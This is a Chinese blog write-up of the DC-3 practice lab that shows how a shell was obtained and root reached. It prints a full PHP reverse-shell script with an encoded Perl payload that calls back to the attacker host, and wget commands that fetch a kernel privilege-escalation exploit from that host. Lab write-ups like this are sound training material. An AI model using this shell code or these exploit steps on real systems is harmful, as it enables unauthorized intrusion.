DC3之后续内容(拿shell、提权)

已于 2024-04-24 15:47:58 修改
阅读量676 收藏 11
点赞数 21
分类专栏: DC靶场 文章标签: android
于 2024-03-07 21:32:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/136497379
版权

网上复制的php反弹代码

<?php
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
	}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
			} 
			elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
			} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.146.140";
$yourport = '4000';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $192.168.146.140 $4000 &");
?>

复制

路径http://192.168.146.141/templates/beez3/shell.php

但还是没连接上,不应该吧、不管了、已经浪费1个多小时了

直接用metaspliot吧

使用2017年的漏洞

设置靶机ip 、run

建立反向连接,shell

交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

现在需要提权

利用系统漏洞提权

查看版本信息Ubuntu16.04 内核为lunix4.4.0-21

hostnamectl

查看Ubuntu16.04的漏洞  Privilege Escalation是提权的意思

用倒数第二个、查找漏洞的文档路径find / -name linux/local/43418.c

或者searchsploit -p(显示漏洞利用的完整路径) 43418.c

43418.c详细信息

.c后缀的文件不能上传、试着更改后缀名、能更改

把4341.c内容全部复制到pwn2.txt里面,这里开头少复制了一个/

修改后缀mv pwn2.txt pwn2.c

编译gcc pwn2.c -o pwn2

可以指定生成的目录gcc -o /var/www/html/templates/beez3/pwn2 pwn2.c

报错了寄存器rdx似乎是这个原因,但我这里有ebp寄存器

换一个漏洞使用

用39772.txt 

路径为/usr/share/exploitdb/exploits/linux/local/39772.txt 

查看

kali主机下载https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压、鼠标右键

开启http服务

python3 -m http.server 8888

拿到shell的终端去下载

wget http://192.168.146.140:8888/Desktop/39772/exploit.tar

然后解压tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

提权成功

拿到flag

cd ~

总结:

遇到难题不要耗费太多时间

MOMO8849
关注
  • 21
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VC++中使用使用winnet类获取网页内容
guomei的专栏
02-22 1万+
 2005-09-01VC++中使用使用winnet类获取网页内容 - [VC专栏]微软提供的Winnet类是一个应用层的网络通信组件,它可以使你的应用程序很容易的实现http、ftp、gopher等协议而不需要你去深入的了解协议本身的规范。而之前,如果要想做类似的应用,我们必须了解socket编程并且要对协议本身非常熟悉,哪怕是一个非常非常简单的程序。下面是codegur
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
windows 提权
qq_63527808的博客
11-22 937
一、提权的常用方法。
Shell脚本学习-阶段二十七-命令解释二
qq_43058317的博客
06-16 1945
文章目录-命令解释二前言emacsjedjoenano================picosed===================vi,vim============mtype=============rgrep==========excmpbzcmpcommdiff===========bzdiffdiffstatdiff3find==============locate/slocate=========whereis==========updatedbwhich=========basena..
shell 编程大全
11-26 4996
译者序 毫无疑问,UNIX/Linux最重要的软件之一就是shell,目前最流行的shell被称为Bash(Bourne Again Shell),几乎所有的Linux和绝大部分的UNIX都 可以使用Bash。作为系统与用户之间的交互接口,shell几乎是你在UNIX工作平台上最亲密的朋友,因此,学好shell,是学习Linux/UNIX的的开始, 并且它会始终伴随你的工作学习。 shel
shell学习资料:shell十三问
热门推荐
zhouxf的专栏
04-24 1万+
SHELL十三问 2008125163340          SHELL十三问之五:var=value?export 前后差在哪? 文章整理: 文章来源: 网络 这次让我们暂时丢开command line,先来了解一下bash变量(variable)吧... 所谓的变量,就是就是利用一个特定的"名称"(name)来存取一段可以变化的"值"(value)。 *设定(set)*
004--域渗透学习
weixin_44508748的博客
08-04 1166
一、Kerbers协议NTLM认证 域内访问其他应用服务整个流程如图所示,首先由客户端向域控发起认证请求,域控验证用户是否属于合法域用户,若合法则认证通过,域控响应主机请求分发TGT认证票据(黄金票据可伪造TGT),拿到证书后主机可以继续请求访问域内的应用服务,若权限符合域控会返回允许主机访问域内某应用服务的TGS票据,主机拿着TGS票据访问对应的应用服务,该应用服务器验证TGS通过后主机即可顺利访问应用服务。 TGT TGT验证用户是否属于合法域用户,合法域控则分发TGT认证票据。 黄金票据用于伪
vc++HOOK详细讲解
zbc_vc的专栏
12-08 6287
消息钩子函数入门  Windows 系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实 现的。而钩子是 Windows 系统中非常重要的系统接口,用它可以截获并处理送给其他应用 程序的消息,来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件 消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的钩子, 监视系统中特定事件的发生
2021-01-13
More_Action的博客
01-13 1352
Linux命令这么多,该怎么从入门到精通?其实,这个事情非常的simple,这篇文章将会带你飞,文章非常的长,非常考验耐心。      本文将由一个Linux命令概览开始,说明Linux命令的方方面面。如果你读完这部分还是一头雾水,那么就证明需要按照下面的小白教程去学习了,内容涵盖了:如何挑选Linux发行版、如何安装Linux系统,按照主题学习Linux系统的命令等。 1. Linux命令概览 这部分是给稍微有点Linux经验的同学准备的,如果你是初学者,请跳过
[ctfshow]终极考核wp
cosmoslin的博客
07-07 1764
页面明文flag首页http头首页查看源码,发现可疑路径 访问,需要登录,抓包得到flag进入登陆页面需要输入密码开门,查看js文件,发现密码为输入密码后得到flag备份数据,数据中存在flag在网络测试功能当中可以执行命令,抓包修改测试命令为ls发现,访问得到一串url编码解码得到flag在系统更新处填入645的flag,进行权限验证后远程更新此时抓一下远程更新的包这里存在远程请求文件,很像文件包含,尝试读一下文件确实可以,我们依次读取一下web 643中得到的文件 最终flag在当中 利用数组绕
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
DC.zip_DC shell_Linux dc
09-24
标签“dc_shell”进一步确认了文件内容与DC shell的关联,而“linux_dc”可能是指Linux环境下使用DC工具的相关资源。这些标签帮助我们理解文件的分类和内容重点。 考虑到压缩包内只有一个名为“DC”的文件,这可能...
基于Spring Cloud的IoT DC3物联网平台设计源码
04-06
本项目是一个基于Spring Cloud开发的IoT DC3物联网平台,包含1017个文件,主要文件类型包括Java源代码、图片、YAML配置文件、配置文件、Markdown文档、XML配置文件、Shell脚本、HTTP协议文件、证书文件和密钥文件。...
iot-dc3-master.zip
01-13
标题中的“iot-dc3-master.zip”表明这是一个与物联网(IoT)相关的项目,而“master”通常指的是项目的主分支,暗示这是一个完整的源代码库。描述提到“DC3是一个基于Spring Cloud的开源的、分布式的物联网(IOT)...
Android系统启动】 Android Zygote 进程启动流程源码解析
thirdbro的博客
07-17 712
在 userdebug 版本中,如果 persist.debug.dalvik.vm.jdwp.enabled 为 1,则所有应用均可使用 JDWP 和 ptrace 进行调试。题外话, 之前找zygote源码的时候,本来想直接通过进程名找这个模块的源码,结果发现根本没有zygote这个名字的命令。通过命令查找到对应的进程目录发现,原来的进程的名字当时编译为。通过上面传下来的参数,“com.android.internal.os.ZygoteInit”,可以得知Java层的包名,以此找到Java代码。
Android】视图与常用控件总结
Patrick_yuxuan的博客
07-17 952
属性名描述android:id为视图分配唯一的ID,用于在代码中引用设置视图的宽度设置视图的高度设置视图的外边距设置视图的内边距设置视图在其父视图中的对齐方式(仅适用于ViewGroup的子视图)设置视图内容的对齐方式设置视图的背景颜色或图片设置视图的可见性(visibleinvisiblegone设置视图在线性布局中的权重(仅适用于设置视图是否与父视图的顶部对齐(仅适用于设置视图是否与父视图的底部对齐(仅适用于设置视图是否在父视图中居中(仅适用于设置视图在另一视图的下面(仅适用于。
【23】Android高级知识之Window(四) - ThreadedRenderer
最新发布
mr_zengkun的博客
07-21 771
ThreadedRenderer、WMS
Android GlSurfaceView渲染YUV图形
wolf0706的专栏
07-19 180
OpenGL ES 2.0 的代码,用来显示YUV格式的视频数据。这个示例将包括初始化OpenGL环境、加载Shader程序、绘制纹理等步骤。
dc shell下载
10-26
DC Shell 是一款非常流行的命令行工具,用于在 Direct Connect P2P 网络中下载共享文件。它提供了一种简单而高效的方式,帮助用户下载他们感兴趣的内容。 要下载 DC Shell,首先需要在计算机上安装 Python 环境。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值